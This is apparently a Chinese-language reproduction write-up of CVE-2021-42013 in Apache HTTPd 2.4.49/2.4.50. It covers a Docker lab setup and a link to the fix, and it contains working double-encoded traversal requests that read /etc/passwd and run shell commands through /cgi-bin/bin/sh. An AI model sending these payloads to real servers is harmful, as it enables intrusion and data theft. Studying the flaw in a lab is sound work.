CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路徑穿越以及RCE漏洞


CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路徑穿越以及RCE漏洞

0x00 簡介

Apache HTTPd是Apache基金會開源的一款流行的HTTP服務器。

0x01 漏洞概述

Apache HTTPd是Apache基金會開源的一款流行的HTTP服務器。2021年10月8日Apache HTTPd官方發布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路徑穿越漏洞。由於對CVE-2021-41773 Apache HTTPd 2.4.49 路徑穿越漏洞的修復不完善,攻擊者可構造惡意請求繞過補丁,利用穿越漏洞讀取到Web目錄之外的其他文件。CVE-2021-41773漏洞在v2.4.50版本中進行了修復。但修復版本中只處理了`/xx/.%2e/`這樣的路徑,而沒有正確處理`/.%%32%65/`這種字符串,導致`/.%%32%65/`被帶入后續的處理,仍然可造成目錄穿越。攻擊者可構造惡意請求繞過補丁,利用穿越漏洞讀取到Web目錄之外的其他文件。

同時若Apache HTTPd開啟了cgi支持,攻擊者可構造惡意請求執行命令,控制服務器。

0x02 影響版本

Apache HTTPd 2.4.49/2.4.50版本 且穿越的目錄允許被訪問。

0x03 環境搭建

由於是繞過因此直接使用CVE-2021_41773環境即可

git clone https://github.com/blasty/CVE-2021-41773

cd CVE-2021-41773

docker-compose build && docker-compose up -d

docker ps 查看鏡像所對應端口

 

訪問ip加8080端口出現如下界面即可

 

0x04 漏洞復現

將2e進行url編碼替換即可

 

 

 

任意文件讀取:

訪問界面抓包

直接打payloda即可

Poc:

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

Host: xxx.xxx.xxx.xxx:8080

User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101 Chrome/175.28 OPR/220.59;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

If-None-Match: "29cd-5ce49cca73d40-gzip"

Cache-Control: max-age=0

 

 

 

命令執行:

訪問界面抓包

Poc:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1

Host: xxx.xxx.xxx.xxx:8080

User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

If-None-Match: "29cd-5ce49cca73d40-gzip"

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 7

 

echo;id

0x05 修復方式

Apache團隊已發布相關漏洞的安全更新,用戶可更新到最新的安全版本,鏈接如下:https://httpd.apache.org/download.cgi#apache24

參考鏈接:

https://mp.weixin.qq.com/s/IqyelR29uE0G33-wtYQkvA


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM